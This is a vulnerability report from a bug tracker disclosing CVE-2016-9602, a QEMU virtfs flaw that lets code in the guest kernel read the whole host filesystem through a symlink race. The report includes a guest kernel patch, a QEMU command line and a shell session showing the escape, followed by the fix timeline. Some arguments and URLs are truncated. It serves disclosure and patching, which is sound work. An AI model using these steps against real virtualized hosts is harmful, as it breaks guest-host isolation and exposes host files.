Starred by 4 users
Status: Fixed
Closed: Mar 2

QEMU: virtfs permits guest to access entire host filesystem
Project Member Reported by, Dec 9 2016
If an attacker can execute arbitrary code in the guest kernel and a virtfs is set up, the attacker can access the entire filesystem of the host using a symlink attack. This might require the security model "passthrough" or "none" - I haven't tested with the mapped modes.

Repro steps:

1. Place some file on the host that is not present in the guest - I use a file "real_root_marker" in the root directory of the host:

# echo "this is the host's filesystem root" > /real_root_marker

2. Clone the Linux kernel, apply the following patch and compile it:

diff --git a/fs/9p/vfs_inode.c b/fs/9p/vfs_inode.c
index 30ca770..d6e47df 100644
--- a/fs/9p/vfs_inode.c
+++ b/fs/9p/vfs_inode.c
@@ -803,6 +803,8 @@ struct dentry *v9fs_vfs_lookup(struct inode *dir, struct dentry *dentry,
                return ERR_CAST(dfid);
        name = (char *) dentry->;
+       if (!strncmp(name, "SAME_", 5))
+               name = name + 5;
        fid = p9_client_walk(dfid, 1, &name, 1);
        if (IS_ERR(fid)) {
                if (fid == ERR_PTR(-ENOENT)) {

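Review bot: the two added lines deliberately decouple the dentry's name from the name sent in the Twalk, and that is the point of this guest-side patch rather than a defect: a lookup of `SAME_deleteme` walks `deleteme` on the server, so the guest VFS ends up caching a live dentry and fid for a directory that the later `rmdir /tmp/deleteme` only invalidates under its real name. Two things are worth noting for anyone reusing it: `name + 5` is only safe because `strncmp` has just matched five bytes, so the magic 5 should be tied to the literal (`sizeof("SAME_") - 1`); and the context line `name = (char *) dentry->;` is truncated on this page (the field read there is the dentry's `d_name.name` string, which is what the prefix check inspects), so the hunk has to be applied against the real source rather than pasted from here.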
3. Run qemu, with the patched kernel as guest kernel and with at least one virtfs filesystem. I'm using the following command line, but that's somewhat specific to my setup - anything with a virtfs in passthrough/none mode should work as far as I can tell:

/path/to/qemu/x86_64-softmmu/qemu-system-x86_64 -m 500M -enable-kvm -nographic \
-snapshot \
-drive file=build/initfs.fsimg,index=0,media=disk \
-virtfs local,path=./vm_root,mount_tag=virt_root,security_model=passthrough \
-kernel ./vm_root/root/linux/arch/x86/boot/bzImage \
-net user,net=,host=,restrict=off,dns=,hostfwd=tcp: \
-net nic \
-append "root=/dev/sda ro debug ignore_loglevel console=ttyS0"

4. Inside the VM, mount the virtfs.
5. Somewhere inside the virtfs mountpoint, do this:

root@jannh-vm:/tmp# cat /real_root_marker
cat: /real_root_marker: No such file or directory
root@jannh-vm:/tmp# mkdir deleteme
root@jannh-vm:/tmp# cd SAME_deleteme
root@jannh-vm:/tmp/SAME_deleteme# rmdir /tmp/deleteme
root@jannh-vm:/tmp/SAME_deleteme# ln -s / /tmp/deleteme
root@jannh-vm:/tmp/SAME_deleteme# cat real_root_marker
this is the host's filesystem root

I tested with a recent qemu version from git:// (commit a92f7fe5a82ac9e8d127e92c5dce1a84064126da).

I believe that this is a security issue because according to the qemu manpage, virtfs only exposes the specified directory, while actually, it is possible to access the entire host filesystem.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Project Member Comment 1 by, Jan 17 2017
Labels: CVE-2016-9602
Disclosed on oss-security with proposed patch attached:
Project Member Comment 2 by, Jan 30 2017
New patch series with hopefully working patch is now public at:

Not merged into their repo yet afaics.
Project Member Comment 3 by, Feb 16 2017
Labels: -Restrict-View-Commit
I'm derestricting the bug because it was publicly announced on oss-security and patches are public.
Comment 4 Deleted
Comment 5 Deleted
Project Member Comment 6 by, Mar 2
Status: Fixed
The bug has landed in upstream's git repo (;a=commit;h=7287e3556fdc56bfd0666a67d6b1d3ca9ce04083).